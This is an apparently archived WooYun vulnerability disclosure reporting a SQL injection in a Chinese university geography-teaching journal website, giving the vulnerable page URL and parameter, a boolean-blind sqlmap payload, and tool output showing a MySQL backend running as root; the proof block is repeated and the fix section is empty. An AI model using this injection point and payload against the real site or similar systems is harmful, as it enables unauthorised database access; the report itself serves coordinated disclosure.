当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2015-0165115
漏洞标题:
华东师范大学地理教学网注入一枚,root权限
相关厂商:
华东师范大学
漏洞作者:
路人甲
提交时间:
2015-12-28 12:49
修复时间:
2016-02-12 18:49
公开时间:
2016-02-12 18:49
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
10
漏洞状态:
厂商已经确认
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2015-12-28: 细节已通知厂商并且等待厂商处理中
2015-12-30: 厂商已经确认,细节仅向厂商公开
2016-01-09: 细节向核心白帽子及相关领域专家公开
2016-01-19: 细节向普通白帽子公开
2016-01-29: 细节向实习白帽子公开
2016-02-12: 细节向公众公开

简要描述:

《地理教学》创刊于1959年,教育部主管,华东师范大学主办,由上海《地理教学》杂志社编辑出版。创刊初期为不定期发行,后因发行量、读者需要与业务发展的需要,经历了双月刊、月刊至半月刊的发展历程。主要栏目有高中地理、教学研究、初中地理、考试研究等,深受广大地理教育教学与科研工作者的喜爱。读者群体遍布中国各地,在海外也具有一定影响。现为中国教育学会地理教学研究会会刊,编委会成员为我国地理教育教学一线的知名专家、学者,保证了《地理教学》的权威性。经过五十余年的发展,《地理教学》正在尝试着不断创新、锐意进取,突破原有的形式,力图运用新兴媒体,不断扩展受众群体,提高大众地理素养。

详细说明:

注入点:http://www.dljx.ecnu.edu.cn/content.php?tid=2

GET parameter 'tid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 82 HTTP(s) requests:
---
Parameter: tid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: tid=2  AND 4752=4752
---
[10:04:30] [INFO] testing MySQL
[10:04:32] [INFO] confirming MySQL
[10:04:35] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0


current user: 'root@localhost'
available databases [1]:
[*] dili

1.png

2.png

漏洞证明:

注入点:http://www.dljx.ecnu.edu.cn/content.php?tid=2

GET parameter 'tid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 82 HTTP(s) requests:
---
Parameter: tid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: tid=2  AND 4752=4752
---
[10:04:30] [INFO] testing MySQL
[10:04:32] [INFO] confirming MySQL
[10:04:35] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0


current user: 'root@localhost'
available databases [1]:
[*] dili

1.png

2.png

修复方案:

你们更专业。

版权声明:转载请注明来源 路人甲@乌云

>

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-12-30 10:00

厂商回复:

通知二级单位处理。

最新状态:

暂无